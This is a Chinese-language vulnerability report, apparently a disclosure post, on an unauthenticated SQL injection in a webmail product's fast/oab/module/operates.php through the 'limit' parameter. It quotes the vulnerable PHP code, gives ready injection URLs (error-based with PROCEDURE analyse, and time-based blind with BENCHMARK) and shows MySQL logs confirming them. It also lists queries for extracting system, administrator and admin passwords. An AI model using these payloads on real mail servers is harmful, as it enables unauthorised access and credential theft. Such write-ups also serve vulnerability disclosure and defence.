上次搜索只在client搜索,今天无意在fast目录下搜索了下,又发现了一处。 注:client的目录下的所有函数必须登录才可以执行,fast的目录无需登录可以执行部分存在的函数,但并不能查看邮件等等。 漏洞与上一个原理一样,但文件不同,此处访问权限设置不严格,可以任意用户访问,导致可以无需登录即可sql注入,limit无法使用sleep,用benchamark延时 漏洞文件/fast/oab/module/operates.php代码
if ( ACTION == "member-get" ) { $dept_id = gss( $_GET['dept_id'] ); $keyword = gss( $_GET['keyword'] ); $page = $_GET['page'] ? gss( $_GET['page'] ) : 1; //limit $limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25;//用户可控的变量 $orderby = gss( $_GET['orderby'] ); $is_reverse = gss( $_GET['is_reverse'] ); $data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 ); $department_list = create_array( $data_cache, "dept_id", "name" ); $where = ""; if ( $dept_id && $dept_id != "-1" ) { $Tree = $Department->getTreeObject( ); $Tree->set_data_cache( $data_cache ); $Tree->sort_data( -1, 1 ); $dept_ids = $Tree->get_child_id( $dept_id ); $user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 ); $where = "t1.UserID IN (".$user_ids.")"; } if ( $keyword ) { if ( $where ) { $where .= " AND "; } if ( strpos( $keyword, "@" ) ) { $key_tmp = explode( "@", $keyword ); $keyword = $key_tmp[0]; } $where .= "(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")"; } switch ( $orderby ) { case "fullname" : $orderby = "t1.FullName"; break; case "mailbox" : $orderby = "t1.Mailbox"; break; case "sex" : $orderby = "t2.sex"; break; case "birthday" : $orderby = "t2.birthday"; break; case "mobile" : $orderby = "t2.mobil"; break; case "tel" : $orderby = "t2.teleextension"; break; case "position" : $orderby = "t2.headship"; break; case "group_num" : $orderby = "t2.o_group"; break; case "email" : $orderby = "t1.Mailbox"; break; $orderby = ""; } $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 );//进入了函数
$limit可控,因而产生了注入,注入利用过程 首先向url post数据,(注,其实该接口并非是任意登录,执行后仅可以执行仅有的几个函数,所以如果执行了有sql缺陷的函数,则产生相应了相应的无需登录的sql注入问题,如可以update密保问题则产生了获得任意用户密码的缺陷,但可访问的函数有限,并不能查看用户邮件等等)
获得认证后,执行如下 http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1) 发现结果如下
其执行的sql语句为
150128 21:44:43 3142 Connect umail@localhost on 3142 Query SET NAMES 'UTF8' 3142 Init DB umail 3142 Query SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id` 3142 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 3142 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1) 3142 Quit
由于未执行错误回显,因而我们实施盲注,代码为 http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)
其sql代码为
150128 21:47:16 3144 Connect umail@localhost on 3144 Query SET NAMES 'UTF8' 3144 Init DB umail 3144 Query SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id` 3144 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 3144 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)
成功注入 因而可以通过脚本跑不同的用户帐号和密码,管理员的 #select+password+from+userlist+where+userid=2 system用户 #select+password+from+web_usr+where+usr_code=1 administrator用户 #select+password+from+web_usr+where+usr_code=2 admin用户 普通用户的话遍历userid获取username password即可。 附盲注脚本(脚本写的一半,未用二分法等,将就用) 本地测试
以及官网管理登录截图